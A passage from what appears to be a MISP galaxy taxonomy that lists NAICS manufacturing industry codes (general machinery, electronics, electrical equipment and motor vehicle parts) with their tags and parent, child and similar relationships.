The tag is: misp-galaxy:naics="333923"

333923 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333924

Industrial Truck, Tractor, Trailer, and Stacker Machinery Manufacturing

The tag is: misp-galaxy:naics="333924"

333924 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

33399

All Other General Purpose Machinery Manufacturing

The tag is: misp-galaxy:naics="33399"

33399 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333991

Power-Driven Handtool Manufacturing

The tag is: misp-galaxy:naics="333991"

333991 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333992

Welding and Soldering Equipment Manufacturing

The tag is: misp-galaxy:naics="333992"

333992 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333993

Packaging Machinery Manufacturing

The tag is: misp-galaxy:naics="333993"

333993 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333994

Industrial Process Furnace and Oven Manufacturing

The tag is: misp-galaxy:naics="333994"

333994 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333995

Fluid Power Cylinder and Actuator Manufacturing

The tag is: misp-galaxy:naics="333995"

333995 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333996

Fluid Power Pump and Motor Manufacturing

The tag is: misp-galaxy:naics="333996"

333996 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

333998

All Other Miscellaneous General Purpose Machinery Manufacturing

The tag is: misp-galaxy:naics="333998"

333998 has relationships with:

  • child-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

334

Computer and Electronic Product Manufacturing

The tag is: misp-galaxy:naics="334"

334 has relationships with:

  • parent-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3343" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3346" with estimative-language:likelihood-probability="likely"

3341

Computer and Peripheral Equipment Manufacturing

The tag is: misp-galaxy:naics="3341"

3341 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334118" with estimative-language:likelihood-probability="likely"

33411

Computer and Peripheral Equipment Manufacturing

The tag is: misp-galaxy:naics="33411"

33411 has relationships with:

  • child-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

334111

Electronic Computer Manufacturing

The tag is: misp-galaxy:naics="334111"

334111 has relationships with:

  • child-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

334112

Computer Storage Device Manufacturing

The tag is: misp-galaxy:naics="334112"

334112 has relationships with:

  • child-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

334118

Computer Terminal and Other Computer Peripheral Equipment Manufacturing

The tag is: misp-galaxy:naics="334118"

334118 has relationships with:

  • child-of: misp-galaxy:naics="3341" with estimative-language:likelihood-probability="likely"

3342

Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="3342"

3342 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33429" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334290" with estimative-language:likelihood-probability="likely"

33421

Telephone Apparatus Manufacturing

The tag is: misp-galaxy:naics="33421"

33421 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334210" with estimative-language:likelihood-probability="likely"

334210

Telephone Apparatus Manufacturing

The tag is: misp-galaxy:naics="334210"

334210 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33421" with estimative-language:likelihood-probability="likely"

33422

Radio and Television Broadcasting and Wireless Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="33422"

33422 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334220" with estimative-language:likelihood-probability="likely"

334220

Radio and Television Broadcasting and Wireless Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="334220"

334220 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33422" with estimative-language:likelihood-probability="likely"

33429

Other Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="33429"

33429 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334290" with estimative-language:likelihood-probability="likely"

334290

Other Communications Equipment Manufacturing

The tag is: misp-galaxy:naics="334290"

334290 has relationships with:

  • child-of: misp-galaxy:naics="3342" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33429" with estimative-language:likelihood-probability="likely"

3343

Audio and Video Equipment Manufacturing

The tag is: misp-galaxy:naics="3343"

3343 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334310" with estimative-language:likelihood-probability="likely"

33431

Audio and Video Equipment Manufacturing

The tag is: misp-galaxy:naics="33431"

33431 has relationships with:

  • child-of: misp-galaxy:naics="3343" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334310" with estimative-language:likelihood-probability="likely"

334310

Audio and Video Equipment Manufacturing

The tag is: misp-galaxy:naics="334310"

334310 has relationships with:

  • child-of: misp-galaxy:naics="3343" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33431" with estimative-language:likelihood-probability="likely"

3344

Semiconductor and Other Electronic Component Manufacturing

The tag is: misp-galaxy:naics="3344"

3344 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334416" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334417" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334418" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334419" with estimative-language:likelihood-probability="likely"

33441

Semiconductor and Other Electronic Component Manufacturing

The tag is: misp-galaxy:naics="33441"

33441 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334412

Bare Printed Circuit Board Manufacturing

The tag is: misp-galaxy:naics="334412"

334412 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334413

Semiconductor and Related Device Manufacturing

The tag is: misp-galaxy:naics="334413"

334413 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334416

Capacitor, Resistor, Coil, Transformer, and Other Inductor Manufacturing

The tag is: misp-galaxy:naics="334416"

334416 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334417

Electronic Connector Manufacturing

The tag is: misp-galaxy:naics="334417"

334417 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334418

Printed Circuit Assembly (Electronic Assembly) Manufacturing

The tag is: misp-galaxy:naics="334418"

334418 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

334419

Other Electronic Component Manufacturing

The tag is: misp-galaxy:naics="334419"

334419 has relationships with:

  • child-of: misp-galaxy:naics="3344" with estimative-language:likelihood-probability="likely"

3345

Navigational, Measuring, Electromedical, and Control Instruments Manufacturing

The tag is: misp-galaxy:naics="3345"

3345 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33451" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334514" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334515" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334516" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334519" with estimative-language:likelihood-probability="likely"

33451

Navigational, Measuring, Electromedical, and Control Instruments Manufacturing

The tag is: misp-galaxy:naics="33451"

33451 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334510" with estimative-language:likelihood-probability="likely"

334510

Electromedical and Electrotherapeutic Apparatus Manufacturing

The tag is: misp-galaxy:naics="334510"

334510 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33451" with estimative-language:likelihood-probability="likely"

334511

Search, Detection, Navigation, Guidance, Aeronautical, and Nautical System and Instrument Manufacturing

The tag is: misp-galaxy:naics="334511"

334511 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334512

Automatic Environmental Control Manufacturing for Residential, Commercial, and Appliance Use

The tag is: misp-galaxy:naics="334512"

334512 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334513

Instruments and Related Products Manufacturing for Measuring, Displaying, and Controlling Industrial Process Variables

The tag is: misp-galaxy:naics="334513"

334513 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334514

Totalizing Fluid Meter and Counting Device Manufacturing

The tag is: misp-galaxy:naics="334514"

334514 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334515

Instrument Manufacturing for Measuring and Testing Electricity and Electrical Signals

The tag is: misp-galaxy:naics="334515"

334515 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334516

Analytical Laboratory Instrument Manufacturing

The tag is: misp-galaxy:naics="334516"

334516 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334517

Irradiation Apparatus Manufacturing

The tag is: misp-galaxy:naics="334517"

334517 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

334519

Other Measuring and Controlling Device Manufacturing

The tag is: misp-galaxy:naics="334519"

334519 has relationships with:

  • child-of: misp-galaxy:naics="3345" with estimative-language:likelihood-probability="likely"

3346

Manufacturing and Reproducing Magnetic and Optical Media

The tag is: misp-galaxy:naics="3346"

3346 has relationships with:

  • child-of: misp-galaxy:naics="334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33461" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="334610" with estimative-language:likelihood-probability="likely"

33461

Manufacturing and Reproducing Magnetic and Optical Media

The tag is: misp-galaxy:naics="33461"

33461 has relationships with:

  • child-of: misp-galaxy:naics="3346" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="334610" with estimative-language:likelihood-probability="likely"

334610

Manufacturing and Reproducing Magnetic and Optical Media

The tag is: misp-galaxy:naics="334610"

334610 has relationships with:

  • child-of: misp-galaxy:naics="3346" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33461" with estimative-language:likelihood-probability="likely"

335

Electrical Equipment, Appliance, and Component Manufacturing

The tag is: misp-galaxy:naics="335"

335 has relationships with:

  • parent-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

3351

Electric Lighting Equipment Manufacturing

The tag is: misp-galaxy:naics="3351"

3351 has relationships with:

  • child-of: misp-galaxy:naics="335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335139" with estimative-language:likelihood-probability="likely"

33513

Electric Lighting Equipment Manufacturing

The tag is: misp-galaxy:naics="33513"

33513 has relationships with:

  • child-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

335131

Residential Electric Lighting Fixture Manufacturing

The tag is: misp-galaxy:naics="335131"

335131 has relationships with:

  • child-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

335132

Commercial, Industrial, and Institutional Electric Lighting Fixture Manufacturing

The tag is: misp-galaxy:naics="335132"

335132 has relationships with:

  • child-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

335139

Electric Lamp Bulb and Other Lighting Equipment Manufacturing

The tag is: misp-galaxy:naics="335139"

335139 has relationships with:

  • child-of: misp-galaxy:naics="3351" with estimative-language:likelihood-probability="likely"

3352

Household Appliance Manufacturing

The tag is: misp-galaxy:naics="3352"

3352 has relationships with:

  • child-of: misp-galaxy:naics="335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335220" with estimative-language:likelihood-probability="likely"

33521

Small Electrical Appliance Manufacturing

The tag is: misp-galaxy:naics="33521"

33521 has relationships with:

  • child-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="335210" with estimative-language:likelihood-probability="likely"

335210

Small Electrical Appliance Manufacturing

The tag is: misp-galaxy:naics="335210"

335210 has relationships with:

  • child-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33521" with estimative-language:likelihood-probability="likely"

33522

Major Household Appliance Manufacturing

The tag is: misp-galaxy:naics="33522"

33522 has relationships with:

  • child-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="335220" with estimative-language:likelihood-probability="likely"

335220

Major Household Appliance Manufacturing

The tag is: misp-galaxy:naics="335220"

335220 has relationships with:

  • child-of: misp-galaxy:naics="3352" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33522" with estimative-language:likelihood-probability="likely"

3353

Electrical Equipment Manufacturing

The tag is: misp-galaxy:naics="3353"

3353 has relationships with:

  • child-of: misp-galaxy:naics="335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335314" with estimative-language:likelihood-probability="likely"

33531

Electrical Equipment Manufacturing

The tag is: misp-galaxy:naics="33531"

33531 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

335311

Power, Distribution, and Specialty Transformer Manufacturing

The tag is: misp-galaxy:naics="335311"

335311 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

335312

Motor and Generator Manufacturing

The tag is: misp-galaxy:naics="335312"

335312 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

335313

Switchgear and Switchboard Apparatus Manufacturing

The tag is: misp-galaxy:naics="335313"

335313 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

335314

Relay and Industrial Control Manufacturing

The tag is: misp-galaxy:naics="335314"

335314 has relationships with:

  • child-of: misp-galaxy:naics="3353" with estimative-language:likelihood-probability="likely"

3359

Other Electrical Equipment and Component Manufacturing

The tag is: misp-galaxy:naics="3359"

3359 has relationships with:

  • child-of: misp-galaxy:naics="335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33592" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335929" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33593" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335931" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335932" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="335999" with estimative-language:likelihood-probability="likely"

33591

Battery Manufacturing

The tag is: misp-galaxy:naics="33591"

33591 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="335910" with estimative-language:likelihood-probability="likely"

335910

Battery Manufacturing

The tag is: misp-galaxy:naics="335910"

335910 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33591" with estimative-language:likelihood-probability="likely"

33592

Communication and Energy Wire and Cable Manufacturing

The tag is: misp-galaxy:naics="33592"

33592 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335921

Fiber Optic Cable Manufacturing

The tag is: misp-galaxy:naics="335921"

335921 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335929

Other Communication and Energy Wire Manufacturing

The tag is: misp-galaxy:naics="335929"

335929 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

33593

Wiring Device Manufacturing

The tag is: misp-galaxy:naics="33593"

33593 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335931

Current-Carrying Wiring Device Manufacturing

The tag is: misp-galaxy:naics="335931"

335931 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335932

Noncurrent-Carrying Wiring Device Manufacturing

The tag is: misp-galaxy:naics="335932"

335932 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

33599

All Other Electrical Equipment and Component Manufacturing

The tag is: misp-galaxy:naics="33599"

33599 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335991

Carbon and Graphite Product Manufacturing

The tag is: misp-galaxy:naics="335991"

335991 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

335999

All Other Miscellaneous Electrical Equipment and Component Manufacturing

The tag is: misp-galaxy:naics="335999"

335999 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

336

Transportation Equipment Manufacturing

The tag is: misp-galaxy:naics="336"

336 has relationships with:

  • parent-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3365" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3366" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

3361

Motor Vehicle Manufacturing

The tag is: misp-galaxy:naics="3361"

3361 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336120" with estimative-language:likelihood-probability="likely"

33611

Automobile and Light Duty Motor Vehicle Manufacturing

The tag is: misp-galaxy:naics="33611"

33611 has relationships with:

  • child-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336110" with estimative-language:likelihood-probability="likely"

336110

Automobile and Light Duty Motor Vehicle Manufacturing

The tag is: misp-galaxy:naics="336110"

336110 has relationships with:

  • child-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33611" with estimative-language:likelihood-probability="likely"

33612

Heavy Duty Truck Manufacturing

The tag is: misp-galaxy:naics="33612"

33612 has relationships with:

  • child-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336120" with estimative-language:likelihood-probability="likely"

336120

Heavy Duty Truck Manufacturing

The tag is: misp-galaxy:naics="336120"

336120 has relationships with:

  • child-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33612" with estimative-language:likelihood-probability="likely"

3362

Motor Vehicle Body and Trailer Manufacturing

The tag is: misp-galaxy:naics="3362"

3362 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336214" with estimative-language:likelihood-probability="likely"

33621

Motor Vehicle Body and Trailer Manufacturing

The tag is: misp-galaxy:naics="33621"

33621 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

336211

Motor Vehicle Body Manufacturing

The tag is: misp-galaxy:naics="336211"

336211 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

336212

Truck Trailer Manufacturing

The tag is: misp-galaxy:naics="336212"

336212 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

336213

Motor Home Manufacturing

The tag is: misp-galaxy:naics="336213"

336213 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

336214

Travel Trailer and Camper Manufacturing

The tag is: misp-galaxy:naics="336214"

336214 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

3363

Motor Vehicle Parts Manufacturing

The tag is: misp-galaxy:naics="3363"

3363 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33631" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33632" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33633" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33634" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33635" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336350" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33636" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336360" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33637" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336370" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33639" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336390" with estimative-language:likelihood-probability="likely"

33631

Motor Vehicle Gasoline Engine and Engine Parts Manufacturing

The tag is: misp-galaxy:naics="33631"

33631 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336310" with estimative-language:likelihood-probability="likely"

336310

Motor Vehicle Gasoline Engine and Engine Parts Manufacturing

The tag is: misp-galaxy:naics="336310"

336310 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33631" with estimative-language:likelihood-probability="likely"

33632

Motor Vehicle Electrical and Electronic Equipment Manufacturing

The tag is: misp-galaxy:naics="33632"

33632 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336320" with estimative-language:likelihood-probability="likely"

336320

Motor Vehicle Electrical and Electronic Equipment Manufacturing

The tag is: misp-galaxy:naics="336320"

336320 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33632" with estimative-language:likelihood-probability="likely"

33633

Motor Vehicle Steering and Suspension Components (except Spring) Manufacturing

The tag is: misp-galaxy:naics="33633"

33633 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336330" with estimative-language:likelihood-probability="likely"

336330

Motor Vehicle Steering and Suspension Components (except Spring) Manufacturing

The tag is: misp-galaxy:naics="336330"

336330 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33633" with estimative-language:likelihood-probability="likely"

33634

Motor Vehicle Brake System Manufacturing

The tag is: misp-galaxy:naics="33634"

33634 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336340" with estimative-language:likelihood-probability="likely"

336340

Motor Vehicle Brake System Manufacturing

The tag is: misp-galaxy:naics="336340"

336340 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33634" with estimative-language:likelihood-probability="likely"

33635

Motor Vehicle Transmission and Power Train Parts Manufacturing

The tag is: misp-galaxy:naics="33635"

33635 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336350" with estimative-language:likelihood-probability="likely"

336350

Motor Vehicle Transmission and Power Train Parts Manufacturing

The tag is: misp-galaxy:naics="336350"

336350 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33635" with estimative-language:likelihood-probability="likely"

33636

Motor Vehicle Seating and Interior Trim Manufacturing

The tag is: misp-galaxy:naics="33636"

33636 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336360" with estimative-language:likelihood-probability="likely"

336360

Motor Vehicle Seating and Interior Trim Manufacturing

The tag is: misp-galaxy:naics="336360"

336360 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33636" with estimative-language:likelihood-probability="likely"

33637

Motor Vehicle Metal Stamping

The tag is: misp-galaxy:naics="33637"

33637 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336370" with estimative-language:likelihood-probability="likely"

336370

Motor Vehicle Metal Stamping

The tag is: misp-galaxy:naics="336370"

336370 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33637" with estimative-language:likelihood-probability="likely"

33639

Other Motor Vehicle Parts Manufacturing

The tag is: misp-galaxy:naics="33639"

33639 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336390" with estimative-language:likelihood-probability="likely"

336390

Other Motor Vehicle Parts Manufacturing

The tag is: misp-galaxy:naics="336390"

336390 has relationships with:

